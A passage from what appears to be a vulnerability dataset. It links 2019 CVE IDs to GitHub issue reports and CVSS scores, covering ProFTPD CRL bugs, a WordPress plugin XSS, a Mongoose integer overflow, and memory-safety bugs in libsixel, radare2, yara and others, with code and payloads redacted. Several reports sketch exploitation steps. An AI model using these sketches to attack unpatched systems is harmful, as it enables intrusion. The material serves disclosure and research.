        "Issue_Url_new": "https://github.com/proftpd/proftpd/issues/861",
        "Repo_new": "proftpd/proftpd",
        "Issue_Created_At": "2019-11-04T16:10:29Z",
        "description": "APITAG (nullptr dereference NUMBERTAG with CRLs in mod_tls of APITAG master HEAD. This is the NUMBERTAG th of NUMBERTAG bugs in the APITAG function. The code fails to take into account an empty CRL, for which APITAG returned NULL in my tests. It proceeds to dereferencing the NULL pointer, crashing the application. My patch is as follows: CODETAG Both of the other code bases which I noticed were getting the issuer CRL lookup right (second bug, issue NUMBERTAG fail to check the return value against NULL as well: FILETAG FILETAG (outdated stunnel NUMBERTAG FWIW NUMBERTAG years ago, stunnel got rid of custom CRL handling code and started relying on APITAG built in handling instead. That was between NUMBERTAG and NUMBERTAG compare src/verify.c from FILETAG and FILETAG . I hit this crash in the summer of NUMBERTAG after fixing the first crash (issue NUMBERTAG when dealing with TLS CRLs using APITAG NUMBERTAG s APITAG NUMBERTAG e package against APITAG NUMBERTAG I quickly reported the issues privately, but APITAG TLS CRL handling remains broken on all branches more than a year later... I'm aware that TLS CRLs are highly unpopular, and that only system administrators are supposed to define them, but clearly, low profile responsible disclosure didn't work here :) Public reports, and CVE ID assignments (for which I'll use this issue as reference), piling onto the recent higher risk issue NUMBERTAG CVETAG ) and older vulnerabilities should help the downstream propagation of all fixes, at least if any downstream provides security support for APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-19270",
        "Issue_Url_old": "https://github.com/proftpd/proftpd/issues/859",
        "Issue_Url_new": "https://github.com/proftpd/proftpd/issues/859",
        "Repo_new": "proftpd/proftpd",
        "Issue_Created_At": "2019-11-04T16:08:50Z",
        "description": "Improper TLS CRL handling NUMBERTAG in mod_tls of APITAG master HEAD. This is the NUMBERTAG nd of NUMBERTAG bugs in the APITAG function. The code fails to perform a CRL lookup by issuer (as the comment right above the block states), it instead performs a second lookup by subject. As a result, in our tests, after crash bugs NUMBERTAG and NUMBERTAG issue NUMBERTAG and issue NUMBERTAG were fixed, APITAG still failed to take into account a valid CRL and break a connection. The patch is as follows: CODETAG At least two other pieces of similar code, which contain the same comment as this one, are getting it right: FILETAG FILETAG (outdated stunnel NUMBERTAG FWIW NUMBERTAG years ago, stunnel got rid of custom CRL handling code and started relying on APITAG built in handling instead. That was between NUMBERTAG and NUMBERTAG compare src/verify.c from FILETAG and FILETAG . I hit this issue in the summer of NUMBERTAG after fixing the two crashes (issue NUMBERTAG and issue NUMBERTAG when dealing with TLS CRLs using APITAG NUMBERTAG s APITAG NUMBERTAG e package against APITAG NUMBERTAG I quickly reported the issues privately, but APITAG TLS CRL handling remains broken on all branches more than a year later... I'm aware that TLS CRLs are highly unpopular, and that only system administrators are supposed to define them, but clearly, low profile responsible disclosure didn't work here :) Public reports, and CVE ID assignments (for which I'll use this issue as reference), piling onto the recent higher risk issue NUMBERTAG CVETAG ) and older vulnerabilities should help the downstream propagation of all fixes, at least if any downstream provides security support for APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19271",
        "Issue_Url_old": "https://github.com/proftpd/proftpd/issues/860",
        "Issue_Url_new": "https://github.com/proftpd/proftpd/issues/860",
        "Repo_new": "proftpd/proftpd",
        "Issue_Created_At": "2019-11-04T16:09:38Z",
        "description": "Improper TLS CRL handling NUMBERTAG in mod_tls of APITAG NUMBERTAG For tracking purposes (this problem is fixed in NUMBERTAG This is the NUMBERTAG rd of NUMBERTAG bugs in the APITAG function. The wrong iteration variable is passed to APITAG probably causing some CRL entries to be ignored. From the NUMBERTAG branches diff: CODETAG FWIW as well NUMBERTAG years ago, stunnel got rid of custom CRL handling code and started relying on APITAG built in handling instead. That was between NUMBERTAG and NUMBERTAG compare src/verify.c from FILETAG and FILETAG . I didn't hit this issue in the summer of NUMBERTAG when dealing with TLS CRLs using APITAG NUMBERTAG s APITAG NUMBERTAG e package, because the set of test CRLs only contained CRLs revoking at most one certificate, but I noticed it in the NUMBERTAG diff. I quickly reported the issues privately, but APITAG TLS CRL handling remains broken on all branches more than a year later... I'm aware that TLS CRLs are highly unpopular, and that only system administrators are supposed to define them, but clearly, low profile responsible disclosure didn't work here :) Public reports, and CVE ID assignments (for which I'll use this issue as reference), piling onto the recent higher risk issue NUMBERTAG CVETAG ) and older vulnerabilities should help the downstream propagation of all fixes, at least if any downstream provides security support for APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19272",
        "Issue_Url_old": "https://github.com/proftpd/proftpd/issues/858",
        "Issue_Url_new": "https://github.com/proftpd/proftpd/issues/858",
        "Repo_new": "proftpd/proftpd",
        "Issue_Created_At": "2019-11-04T16:07:44Z",
        "description": "APITAG (nullptr dereference NUMBERTAG with CRLs in mod_tls of APITAG NUMBERTAG For tracking purposes (this problem is fixed in NUMBERTAG This is the NUMBERTAG st of NUMBERTAG bugs in the APITAG function. It's a direct nullptr dereference: variable initialized to NULL, then dereferenced. I fixed it on my side, then I noticed that it had been fixed upstream in NUMBERTAG From the NUMBERTAG branches diff: CODETAG I'd have expected this kind of issues to be caught by static analysis. Additionally, on my side, I used the following change: APITAG FWIW NUMBERTAG years ago, stunnel got rid of custom CRL handling code and started relying on APITAG built in handling instead. That was between NUMBERTAG and NUMBERTAG compare src/verify.c from FILETAG and FILETAG . My colleagues hit this crash in the summer of NUMBERTAG when dealing with TLS CRLs using APITAG NUMBERTAG s APITAG NUMBERTAG e package against APITAG NUMBERTAG and then I was tasked to debug the issue. I quickly reported the issues privately, but APITAG TLS CRL handling remains broken on all branches more than a year later... I'm aware that TLS CRLs are highly unpopular, and that only system administrators are supposed to define them, but clearly, low profile responsible disclosure didn't work here :) Public reports, and CVE ID assignments (for which I'll use this issue as reference), piling onto the recent higher risk issue NUMBERTAG CVETAG ) and older vulnerabilities should help the downstream propagation of all fixes, at least if any downstream provides security support for APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19306",
        "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/16",
        "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/16",
        "Repo_new": "cybersecurityworks/disclosed",
        "Issue_Created_At": "2019-10-16T11:06:22Z",
        "description": "ZOHO CRM Lead Magnet version NUMBERTAG Details: ZOHO CRM Lead Magnet version NUMBERTAG Bug Report Bug Name: Reflected Cross Site Scripting (XSS) in APITAG Plugin Product Name: APITAG Server: (ZOHO CRM Lead Magnet version NUMBERTAG ersion NUMBERTAG Last Updated NUMBERTAG Homepage: URLTAG Severity: High Status: Fixed Exploitation Requires Authentication?: yes Vulnerable URL: URLTAG Vulnerable Variable: APITAG & APITAG & APITAG APITAG Description: A cross site scripting (XSS) attack can cause arbitrary code (java script) to run in a user\u2019s browser while the browser is connected to a trusted web site. The application targets your application\u2019s users and not the application itself, but it uses your application as the vehicle for the attack. XSS payload is executing when the user loads an create lead form page created in APITAG Zoho CRM Lead Magnet Version NUMBERTAG APITAG Proof of concept: (POC) APITAG NUMBERTAG APITAG By exploiting a Cross site scripting vulnerability an attacker easily gain access to user\u2019s session by stealing cookies and also exploit the user browser NUMBERTAG Login to the application NUMBERTAG Install Zoho CRM Lead Magnet Plugin [ URLTAG Figure NUMBERTAG Zoho CRM Lead Magnet NUMBERTAG Configure the APITAG client id APITAG and APITAG secret key APITAG Figure NUMBERTAG client key and secret id are filled in Authenticating Zoho CRM Plugin NUMBERTAG Click on APITAG New Form APITAG button and fill the values and click on APITAG APITAG button Figure NUMBERTAG new form in Zoho CRM Plugin NUMBERTAG Add the payload APITAG APITAG APITAG to the vulnerable parameters by intercepting the request in a proxy tool. Figure NUMBERTAG Request with XSS payload sent to the server Figure NUMBERTAG Request and response captured in the proxy NUMBERTAG Injected XSS payload is successfully executed when the user visits or reloads the page Figure NUMBERTAG The APITAG is successfully executed in the victim browser context Figure NUMBERTAG The APITAG application running on version NUMBERTAG Figure NUMBERTAG The APITAG APITAG CRM Lead Magnet plugin Version NUMBERTAG APITAG Figure NUMBERTAG The default cross site scripting mitigation setting in wp.config file to prevent cross site scripting attacks. APITAG Steps APITAG NUMBERTAG Logon into APITAG application in localhost NUMBERTAG Access the vulnerable GET Request URL[ URLTAG with XSS payload inserted into the vulnerable variable NUMBERTAG SS will get executed in the user machine once the user clicks on the given vulnerable link. APITAG APITAG NUMBERTAG Discovered in APITAG Product NUMBERTAG Reported to EMAILTAG rg NUMBERTAG Got instant response from APITAG plugin team( EMAILTAG rg) acknowledging the Vulnerability NUMBERTAG Got mail confirming that the issue is existed and fixed. APITAG by: APITAG Saran Baskar from APITAG Cyber Security Works Pvt Ltd APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-19307",
        "Issue_Url_old": "https://github.com/cesanta/mongoose/issues/1055",
        "Issue_Url_new": "https://github.com/cesanta/mongoose/issues/1055",
        "Repo_new": "cesanta/mongoose",
        "Issue_Created_At": "2019-10-02T06:55:52Z",
        "description": "Integer overflow when decode mqtt variable length. The problem occurs in function APITAG , when the broker proceeds a message , first it decodes a sequence bytes from the NUMBERTAG nd to get the length of data and then determine the end of data by sum up p and len : ERRORTAG However, if len is too large, the value of end become less than value of p . And the root cause here is this line: APITAG Using modern gcc compiler on linux, when the broker casts down to data type of len ( which is APITAG ), the value will be auto cast to NUMBERTAG bit. ERRORTAG and the result is: APITAG Exploit concept of NUMBERTAG s complement, we can control the value of end from APITAG to APITAG . Impact: Remote APITAG if value of end equals to APITAG , then the current message won't be removed from IO buffer, which leads to an infinite loop ( for example: the broker is always busy if we send this payload APITAG , tested on the latest version of Mongoose on Ubuntu ) Potential out of bound access: because the value of end may be less than APITAG , it can be exploited as out of bound read/write in further developments",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19316",
        "Issue_Url_old": "https://github.com/hashicorp/terraform/issues/23493",
        "Issue_Url_new": "https://github.com/hashicorp/terraform/issues/23493",
        "Repo_new": "hashicorp/terraform",
        "Issue_Created_At": "2019-11-25T21:15:04Z",
        "description": "State transmitted in cleartext for azurerm backend with SAS token. APITAG Terraform Version APITAG CODETAG Expected Behavior APITAG Terraform should transfer state over HTTPS Actual Behavior APITAG Terraform transmits the state over HTTP Steps to Reproduce APITAG NUMBERTAG Create a SAS token for the storage account with either the spr set to APITAG or not present NUMBERTAG Run a plan using the SAS token for authenticating Additional Context APITAG This was originally discovered under the azure provider as URLTAG and is related to URLTAG Terraform is still using an older version of the SDK which doesn't have this fix. Workarounds are to set the spr to https or use an access key instead. With the SDK fix, if spr is APITAG , then HTTP is also used instead of HTTPS. References APITAG URLTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19375",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5998",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5998",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2019-11-14T02:15:57Z",
        "description": "Placeholder issue. Details coming soon. Relates to URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19376",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6005",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6005",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2019-11-14T05:14:54Z",
        "description": "Placeholder issue. Details coming soon. Relates to APITAG NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-19507",
        "Issue_Url_old": "https://github.com/manvel-khnkoyan/jpv/issues/6",
        "Issue_Url_new": "https://github.com/manvel-khnkoyan/jpv/issues/6",
        "Repo_new": "manvel-khnkoyan/jpv",
        "Issue_Created_At": "2019-11-28T22:12:05Z",
        "description": "A vulnerability in APITAG We found that a maliciously crafted json can bypass the validation logics of the jpv. The vulnerability is from the following code: jpv leverages the built in constructor of unsafe user input to detect type information. However, a crafted payload can overwrite this builtin attribute to manipulate the validation result. URLTAG Reproduce Script CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19588",
        "Issue_Url_old": "https://github.com/kvesteri/validators/issues/86",
        "Issue_Url_new": "https://github.com/python-validators/validators/issues/86",
        "Repo_new": "python-validators/validators",
        "Issue_Created_At": "2018-06-06T23:00:03Z",
        "description": "Text string that causes APITAG to lock at NUMBERTAG CPU usage. The following string makes validators NUMBERTAG get lock at NUMBERTAG CPU forever. APITAG Logs: CODETAG APITAG APITAG never ends. If I go to htop, the python process is at NUMBERTAG CPU) With version NUMBERTAG this doesn't happen. Logs: CODETAG The environment for tests was APITAG Docker image from NUMBERTAG days ago. Temporary fix: uninstall NUMBERTAG and install NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19590",
        "Issue_Url_old": "https://github.com/radareorg/radare2/issues/15543",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/15543",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2019-12-04T09:29:34Z",
        "description": "Integer Overflow in APITAG at PATHTAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | None | Architecture/bits of the file (mandatory) | None | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG gcb NUMBERTAG b5e8f commit: APITAG build NUMBERTAG Expected behavior CODETAG Actual behavior APITAG Steps to reproduce the behavior Follow the command I list above Additional Logs, screenshots, source code, configuration dump, ... In r_asm_massemble URLTAG at FILETAG , when r2 tries to assemble a long input with too many tokens , new_token_size URLTAG will be integer overflowed to zero. Later, realloc(tokens, sizeof (char ) new_tokens_size) URLTAG will actually free tokens , leading a Use After Free . More serious, the freed tokens can be filled with arbitrary data, which can be used to exploit to RCE. The bug code is listed below, a quick fix will be to add a upper boundary check for APITAG CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-19601",
        "Issue_Url_old": "https://github.com/pkubowicz/opendetex/issues/60",
        "Issue_Url_new": "https://github.com/pkubowicz/opendetex/issues/60",
        "Repo_new": "pkubowicz/opendetex",
        "Issue_Created_At": "2019-12-05T08:11:30Z",
        "description": "Buffer overflow in the APITAG function. Hi, While fuzzing APITAG with Honggfuzz, I found a buffer overflow in the APITAG function, in detex.l. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-19602",
        "Issue_Url_old": "https://github.com/golang/go/issues/35777",
        "Issue_Url_new": "https://github.com/golang/go/issues/35777",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2019-11-22T15:24:36Z",
        "description": "runtime: memory corruption on Linu NUMBERTAG from async preemption. We've had several reports of memory corruption on Linu NUMBERTAG or later) kernels from people running tip since asynchronous preemption was committed. This is a super bug to track these issues. I suspect they all have one root cause. Typically these are \"runtime error: invalid memory address or nil pointer dereference\" or \"runtime: unexpected return pc\" panics. They can also appear as self detected data corruption. If you encounter a crash that could be random memory corruption, are running Linu NUMBERTAG or later, and are running a recent tip Go (after commit APITAG please file a new issue and add a comment here. If you can reproduce it, please try setting \"GODEBUG=asyncpreemptoff NUMBERTAG in your environment and seeing if you can still reproduce it. Duplicate issues (I'll edit this comment to keep this up to date): runtime: corrupt binary export data seen after signal preemption CL NUMBERTAG Corruption in file version header observed by vet. Medium reproducible. Strong leads. cmd/compile: panic during early copyelim crash NUMBERTAG Invalid memory address in PATHTAG Not reproducible. Nothing obvious in stack trace. Haven't dug into assembly.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 4.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-19624",
        "Issue_Url_old": "https://github.com/opencv/opencv/issues/14554",
        "Issue_Url_new": "https://github.com/opencv/opencv/issues/14554",
        "Repo_new": "opencv/opencv",
        "Issue_Created_At": "2019-05-14T13:24:09Z",
        "description": "APITAG segfault for small images. System information (version) APITAG NUMBERTAG Operating System / Platform => Windows NUMBERTAG Bit Compiler => Visual Studio NUMBERTAG APITAG NUMBERTAG Operating System / Platform => Any Compiler => Any Detailed description APITAG segfaults for small images. The problem is in the calculation of pyramid scales. Variable APITAG is assumed to be greater or equal than APITAG in APITAG / APITAG functions, while this is not true for small images. Actually, APITAG can be even less than NUMBERTAG If APITAG is less than APITAG , loop body in APITAG / APITAG functions doesn't execute and Ux , Uy arrays are accessed out of bounds URLTAG . As a solution, the finest level may be selected dependent on the coarsest level as in DIS author's code URLTAG instead of constant for every preset, while coarsest level may be limited to be greater or equal than zero. Steps to reproduce CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 2.5,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19625",
        "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/922",
        "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/922",
        "Repo_new": "aliasrobotics/rvd",
        "Issue_Created_At": "2019-12-05T21:44:23Z",
        "description": "SROS2 leaks node information. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19627",
        "Issue_Url_old": "https://github.com/ros2/sros2/issues/172",
        "Issue_Url_new": "https://github.com/ros2/sros2/issues/172",
        "Repo_new": "ros2/sros2",
        "Issue_Created_At": "2019-12-06T10:08:16Z",
        "description": "SROS2 leaks node information, regardless of rtps_protection_kind setup . Bug report Connected to URLTAG After this patch one wold expect that node information isn't disclosed anymore but testing led to a different result. I'm not that experienced with APITAG at this point so I might be missing something? Ping to MENTIONTAG and MENTIONTAG Operating System: OS NUMBERTAG Ubuntu NUMBERTAG Installation type: from sources Version or commit hash: dashing eloquent master ( URLTAG DDS implementation: APITAG Client library (if applicable): rclpy Steps to reproduce issue Change defaults set APITAG to encrypt and recreate keys. URLTAG Expected behavior Communications are encrypted for third parties (without credentials) in the network, node information isn't disclosed. Actual behavior Node information is still disclosed. Even after applying URLTAG , rebuilding APITAG and regenerating the keys. Additional information Connected to URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19630",
        "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/370",
        "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/370",
        "Repo_new": "michaelrsweet/htmldoc",
        "Issue_Created_At": "2019-12-06T17:57:51Z",
        "description": "Stack based buffer overflow in the APITAG function. Hi, While fuzzing htmldoc with Honggfuzz, I found a stack based buffer overflow in the APITAG function, in string.c. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-19635",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/103",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/103",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2019-12-02T10:49:48Z",
        "description": "A heap buffer overflow in function sixel_decode_raw_impl at APITAG NUMBERTAG due to integer overflow. libsixel version libsixel NUMBERTAG description txt None download link None others please send email to EMAILTAG if you have any questions. si EMAILTAG NUMBERTAG heap buffer overflow description An issue was discovered in libsixel NUMBERTAG There is a/an heap buffer overflow in function sixel_decode_raw_impl at APITAG NUMBERTAG commandline img2sixel APITAG o /dev/null source CODETAG bug report ERRORTAG others from fuzz project pwd libsixel img2sixel NUMBERTAG crash name pwd libsixel img2sixel NUMBERTAG pnm Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19636",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/104",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/104",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2019-12-02T10:51:14Z",
        "description": "An integer overflow in function sixel_encode_body at APITAG NUMBERTAG libsixel version libsixel NUMBERTAG description txt None download link None others please send email to EMAILTAG if you have any questions. EMAILTAG NUMBERTAG SEGV_UNKNOW description An issue was discovered in libsixel NUMBERTAG There is an integer overflow in function sixel_encode_body at APITAG NUMBERTAG commandline img2sixel APITAG o /dev/null source CODETAG bug report ERRORTAG others from fuzz project pwd libsixel img2sixel NUMBERTAG crash name pwd libsixel img2sixel NUMBERTAG pnm Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19637",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/105",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/105",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2019-12-02T10:52:00Z",
        "description": "An integer overflow in function sixel_decode_raw_impl at APITAG libsixel version libsixel NUMBERTAG description txt None download link None others please send email to EMAILTAG if you have any questions. si EMAILTAG NUMBERTAG integer_overflow description An issue was discovered in libsixel NUMBERTAG There is an integer overflow in function sixel_decode_raw_impl at APITAG commandline img2sixel APITAG o /dev/null source In a while loop, it do not check if integer overflow is in APITAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19638",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/102",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/102",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2019-12-02T10:47:41Z",
        "description": "A heap buffer overflow found in function load_pnm at APITAG NUMBERTAG due to integer overflow. libsixel version libsixel NUMBERTAG description txt None download link None others please send email to EMAILTAG if you have any questions. EMAILTAG NUMBERTAG heap buffer overflow description An issue was discovered in libsixel NUMBERTAG There is a/an heap buffer overflow in function load_pnm at APITAG NUMBERTAG commandline img2sixel APITAG o /dev/null source ERRORTAG bug report ERRORTAG others from fuzz project pwd libsixel img2sixel NUMBERTAG crash name pwd libsixel img2sixel NUMBERTAG pnm Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19647",
        "Issue_Url_old": "https://github.com/radareorg/radare2/issues/15545",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/15545",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2019-12-06T07:49:36Z",
        "description": "Lack of Validation Check for APITAG at APITAG . Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | None | Architecture/bits of the file (mandatory) | None | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG gb7cc NUMBERTAG a commit: APITAG build NUMBERTAG Expected behavior APITAG Actual behavior APITAG Steps to reproduce the behavior Please follow the steps I list above Additional Logs, screenshots, source code, configuration dump, ... At FILETAG , the lack of validation check of variable content URLTAG will cause crash and arbitrary read via craft input. below is the vulnerable code. CODETAG If APITAG tries to open an invalid file, content will be NULL. Later, because skip is the input number, APITAG will cause crash, or arbitrary write via crafted input.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-19648",
        "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/1178",
        "Issue_Url_new": "https://github.com/virustotal/yara/issues/1178",
        "Repo_new": "virustotal/yara",
        "Issue_Created_At": "2019-12-08T08:50:29Z",
        "description": "Out of Bounds Memory Access in macho module. In FILETAG , yara doesn't check whether the variable command_size URLTAG is consistent with the command's real size. A crafted macho file will lead an out of bounds memory access later. Following is the bug code. ERRORTAG If the size is NUMBERTAG APITAG , and there is only one command whose size is APITAG . The memory layout of the crafted macho would look like: APITAG Thus, when yara tries to handle the second command here URLTAG , yara will access the address after data URLTAG , causing an out of bounds memory access. This will cause crash or potentials code executions. The poc is attach: ERRORTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-19698",
        "Issue_Url_old": "https://github.com/marc-q/libwav/issues/25",
        "Issue_Url_new": "https://github.com/marc-q/libwav/issues/25",
        "Repo_new": "marc-q/libwav",
        "Issue_Created_At": "2019-10-24T07:14:38Z",
        "description": "SEGV in function wav_content_read in libwav.c. SEGV in function wav_content_read in libwav.c Tested in Ubuntu NUMBERTAG bit I use the FILETAG and the following command: APITAG and get: APITAG I use valgrind to analysis the bug and get the below information: ERRORTAG I use gcc NUMBERTAG and APITAG to build libwav, this FILETAG can cause SEGV signal in function PATHTAG when running the wav_gain in folder tools/wav_gain with the following command: APITAG This is the ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-19702",
        "Issue_Url_old": "https://github.com/modoboa/modoboa-dmarc/issues/38",
        "Issue_Url_new": "https://github.com/modoboa/modoboa-dmarc/issues/38",
        "Repo_new": "modoboa/modoboa-dmarc",
        "Issue_Created_At": "2019-11-25T22:32:21Z",
